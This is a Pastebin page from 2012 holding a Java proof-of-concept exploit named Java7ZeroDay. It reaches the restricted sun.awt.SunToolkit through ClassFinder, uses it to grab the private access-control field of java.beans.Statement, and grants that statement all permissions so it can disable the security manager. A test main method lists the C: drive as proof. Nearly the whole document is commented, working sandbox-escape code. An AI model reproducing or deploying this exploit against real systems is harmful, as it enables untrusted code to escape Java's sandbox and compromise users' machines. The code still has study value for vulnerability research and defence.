API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Aug 30th, 2012
301
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 2.45 KB | None | 0 0
raw download clone embed print report
  1. import java.beans.*;
  2. import java.io.File;
  3. import java.lang.reflect.Field;
  4. import java.net.URL;
  5. import java.security.*;
  6. import java.security.cert.Certificate;
  7.  
  8. import com.sun.beans.finder.ClassFinder;
  9.  
  10. public class Java7ZeroDay {
  11.  
  12.     public static void disableSecurity() throws Throwable {
  13.  
  14.         // get access to sun.awt.SunToolkit, which is in a restricted package,
  15.         // so this should NOT work...
  16.         Class<?> sun_awt_SunToolkit = ClassFinder.findClass("sun.awt.SunToolkit");
  17.  
  18.         // the rest is just a short way to exploit having access to that class.
  19.  
  20.         // we have to call everything "indirectly" since the verifier would
  21.         // refuse to load the class if it directly tried to call that methods.
  22.  
  23.         // call SunToolkit.getField to get an accessor to private "acc" field of
  24.         // Statement.class. (That method is new in Java 7, but there are plenty
  25.         // of other (more convoluted) ways in earlier versions to elevate
  26.         // permissions if you have access to restricted packages).
  27.         Expression expr = new Expression(sun_awt_SunToolkit, "getField", new Object[] { Statement.class, "acc" });
  28.         expr.execute();
  29.         Field acc_Field = ((Field) expr.getValue());
  30.  
  31.         // create an access control context with all permissions
  32.         Permissions allPerms = new Permissions();
  33.         allPerms.add(new AllPermission());
  34.         AccessControlContext allPermAcc = new AccessControlContext(new ProtectionDomain[] {
  35.                 new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), allPerms)
  36.         });
  37.  
  38.         // create a statement that disabled the security manager, to run in our
  39.         // own untrusted access control context
  40.         Statement disableSecurityManager = new Statement(java.lang.System.class, "setSecurityManager", new Object[1]);
  41.  
  42.         // use our private acc field accessor to change the access control
  43.         // context of the statement above to the access control context with all
  44.         // permissions
  45.         acc_Field.set(disableSecurityManager, allPermAcc);
  46.  
  47.         // and call it (now that it has all permissions)
  48.         disableSecurityManager.execute();
  49.     }
  50.  
  51.     // test method, call this like this
  52.     // java -Djava.security.manager Java7ZeroDay
  53.     public static void main(String[] args) throws Throwable {
  54.         try {
  55.             new File("C:/").list();
  56.             System.out.println("No Security Manager present");
  57.         } catch (SecurityException ex) {
  58.             disableSecurity();
  59.             System.out.println("Security Manager disabled. Proof:");
  60.             for (File file : new File("C:/").listFiles())
  61.                 System.out.println("\t" + file);
  62.         }
  63.     }
  64. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!